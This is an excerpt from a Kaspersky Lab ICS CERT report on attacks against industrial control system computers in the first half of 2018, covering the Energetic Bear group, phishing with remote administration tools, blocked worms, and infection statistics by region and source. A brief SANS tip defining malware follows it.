With some rare exceptions, the Energetic Bear/Crouching Yeti group uses publicly available tools to carry out their attacks. All the utilities discovered by the Kaspersky Lab ICS CERT experts have open source code that is freely available on GitHub. This makes the task of attack attribution very difficult without additional group “markers”.

In most cases observed by Kaspersky Lab ICS CERT, the attackers performed tasks to identify vulnerabilities, gain persistence on different nodes and steal authentication data in order to develop the attack further.

An analysis of the compromised servers and the attacks on them showed that for Energetic Bear/Crouching Yeti, almost any vulnerable server on the internet is seen as a potential foothold from which to develop targeted attacks.

The investigation into the initial, intermediate and subsequent targets of these attacks also revealed a diverse geography. The largest number of victims and targets was in Russia, followed by Turkey and Ukraine. Under half of the systems attacked were related to industry, agricultural services and utilities.

Attacks on industrial enterprises using RATs

Kaspersky Lab ICS CERT reported on yet another wave of phishing emails containing malicious attachments aimed primarily at industrial enterprises in Russia. The malicious program used in the attacks installs legitimate software for remote administration – TeamViewer or Remote Manipulator System/Remote Utilities (RMS) – that allows attackers to gain remote control over the targeted systems. Various techniques are used to mask the presence and activity of the unauthorized software.

When they need to move further within a compromised network, the attackers can download an additional set of malicious programs, which is specifically tailored to the attack on each individual victim. This set of malware may contain spyware, additional remote administration tools, software to exploit vulnerabilities in the operating system and application software, as well as the Mimikatz utility, which makes it possible to obtain account data for Windows accounts.

Also, Kaspersky Lab products blocked multiple attacks on the industrial network of an automobile manufacturer and service company, in particular, on computers designed to diagnose the engines and onboard systems of trucks and heavy-duty vehicles.

A RAT was installed and intermittently used on at least one of the computers in the company’s industrial network. Over a period of several months, numerous attempts to launch various malicious programs using the RAT were blocked on the computer. The blocked programs included modifications of the malware detected by Kaspersky Lab products as When launched this worm immediately begins to proliferate on the local network using exploits for the MS17-010 vulnerabilities – the same ones that were published by ShadowBrokers in the spring of 2017 and were used in attacks by the infamous WannaCry and ExPetr cryptors.

The Trojan-Downloader.Nymaim malware family was also blocked. Representatives of this family are often used to download modifications of the Necus family botnet agent which in turn is used to infect computers with ransomware from the Locky family.


All statistical data used in this report was collected using the Kaspersky Security Network (KSN), a distributed antivirus network. The data was received from those KSN users who gave their consent to have data anonymously transferred from their computers. We do not identify the specific companies/organizations sending statistics to KSN, due to the product limitations and regulatory restrictions.


The data was received from ICS computers protected by Kaspersky Lab products that Kaspersky Lab ICS CERT categorizes as part of the industrial infrastructure at organizations. This group includes Windows computers that perform one or several of the following functions:

  • supervisory control and data acquisition (SCADA) servers;
  • data storage servers (Historian);
  • data gateways (OPC);
  • stationary workstations of engineers and operators;
  • mobile workstations of engineers and operators;
  • Human Machine Interface (HMI).

The statistics analyzed also include data received from computers of industrial control network administrators and software developers who develop software for industrial automation systems.

For the purposes of this report, attacked computers are those on which our security solutions have been triggered at least once during the reporting period. When determining percentages of machines attacked, we use the ratio of unique computers attacked to all computers in our sample from which we received anonymized information during the reporting period.

ICS servers and stationary workstations of engineers and operators often do not have full-time direct internet access due to restrictions specific to industrial networks. Internet access may be provided to such computers, for example, during maintenance periods.

Workstations of system/network administrators, engineers, developers and integrators of industrial automation systems may have frequent or even full-time internet connections.

As a result, in our sample of computers categorized by Kaspersky Lab ICS CERT as part of the industrial infrastructure of organizations, about 42% of all machines had regular or full-time internet connections in H1 2018. The remaining machines connected to the Internet no more than once a month, many much less frequently than that.

Main figures

The percentage of ICS computers attacked in H1 2018 increased by 3.5 p.p. compared with H2 2017 and reached 41.2%. The year-over-year increase was 4.6 p.p.

Percentage of ICS computers attacked, H1 2017 – H1 2018

A comparison between different regions of the world shows that:

  • countries in Africa, Asia and Latin America are significantly worse off in terms of the percentage of ICS computers attacked than countries in Europe, North America and Australia;
  • the figures for Eastern Europe are considerably greater than those for Western Europe;
  • the percentage of ICS computers attacked in Southern Europe is higher than that in Northern and Western Europe.

Presumably, this situation could be due to the amounts of funds invested by organizations in infrastructure protection solutions.

Percentage of ICS systems attacked in regions of the world, H1 2018 vs H2 2017

The main sources of infection for computers in organizations’ industrial network infrastructure are the internet, removable media and email. Contrary to the conventional wisdom about control networks being isolated, in the past years the internet became the main source of infection for computers on organizations’ industrial networks.

Main sources of threats blocked on ICS computers (percentage of computers attacked during half-year periods), H12017 – H1 2018

While a year ago, in H1 2017, the internet was the source of threats blocked on 20.6% of ICS computers, in H1 2018 the figure was as high as 27.3%.

Main sources of threats blocked on ICS computers by region, H1 2018

More information about events during H1 2018, detailed statistics and our recommendations you may find in the full version of the report (PDF)

Kaspersky Lab Industrial Control Systems Cyber Emergency Response Team (Kaspersky Lab ICS CERT) is a global project launched by Kaspersky Lab in 2016 to coordinate the efforts of automation system vendors, industrial facility owners and operators, and IT security researchers to protect industrial enterprises from cyberattacks. Kaspersky Lab ICS CERT devotes its efforts primarily to identifying potential and existing threats that target industrial automation systems and the Industrial Internet of Things.

What is Malware

SANS Tip of the Day - Wed, 09/05/2018 - 01:00
Malware is software--a computer program--used to perform malicious actions. In fact, the term malware is a combination of the words malicious and software. Cyber criminals install malware on your computers or devices to gain control over them or gain access to what they contain. Once installed, these attackers can use malware to spy on your online activities, steal your passwords and files, or use your system to attack others.